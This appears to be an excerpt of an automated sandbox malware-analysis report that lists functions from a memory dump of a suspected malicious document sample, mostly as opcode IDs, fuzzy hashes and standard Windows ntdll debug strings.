                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                        • Instruction ID: d1b9f3c2becbd4ca080476e09a9f81f5a6713616d13964468c6d120985579784
                                        • Opcode Fuzzy Hash: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
                                        • Instruction Fuzzy Hash: 0290022120954442D6007558940CA06400597D0205F56D031A10645A5DC6358A51A232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762DD0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                        • Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
                                        • Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
                                        • Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762DB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                        • Instruction ID: 67e486a376a67d209709cf6e86177a22ac7af6c7ac83084a2ed1fe598b90c907
                                        • Opcode Fuzzy Hash: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
                                        • Instruction Fuzzy Hash: 5290023124550402D641715884086064009A7D0241F96C032A0424564EC6558B56AB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762C60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                        • Instruction ID: 3ca6a72b81cc27c48992b0729550830b8596078c5e18eb089da1a43cab948ca8
                                        • Opcode Fuzzy Hash: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
                                        • Instruction Fuzzy Hash: 4A90023120550842D60071588408B46400597E0301F56C036A0124664DC615CA517622
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762CF0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                        • Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
                                        • Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                        • Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                        • Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
                                        • Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                        • Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762CA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                        • Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
                                        • Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                        • Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762F60 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                        • Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
                                        • Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                        • Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                        • Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
                                        • Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                        • Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762FE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                        • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                        • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                        • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762FB0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                        • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                        • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                        • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762FA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                        • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                        • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                        • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762F90 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                        • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                        • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                        • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762E30 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                        • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                        • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                        • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762EE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                        • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                        • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                        • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762EA0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                        • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                        • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                        • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762E80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                        • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                        • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                        • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01763010 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                        • Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
                                        • Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
                                        • Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01763090 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                        • Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
                                        • Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
                                        • Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017639B0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                        • Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
                                        • Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
                                        • Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01763D70 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                        • Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
                                        • Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
                                        • Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01763D10 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                        • Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
                                        • Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
                                        • Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                        • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                        • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                        • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                        • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                        • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                        • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                        Download Yara Rule
                                        Strings
                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                        • Execute=1, xrefs: 01794713
                                        • ExecuteOptions, xrefs: 017946A0
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                        • API String ID: 0-484625025
                                        • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                        • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                        • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                        • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: __aulldvrm
                                        • String ID: +$-$0$0
                                        • API String ID: 1302938615-699404926
                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                        • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: %%%u$[$]:%u
                                        • API String ID: 48624451-2819853543
                                        • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                        • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                        • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                        • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Re-Waiting, xrefs: 0179031E
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                        • API String ID: 0-2474120054
                                        • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                        • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                        • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                        • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        • RTL: Resource at %p, xrefs: 01797B8E
                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
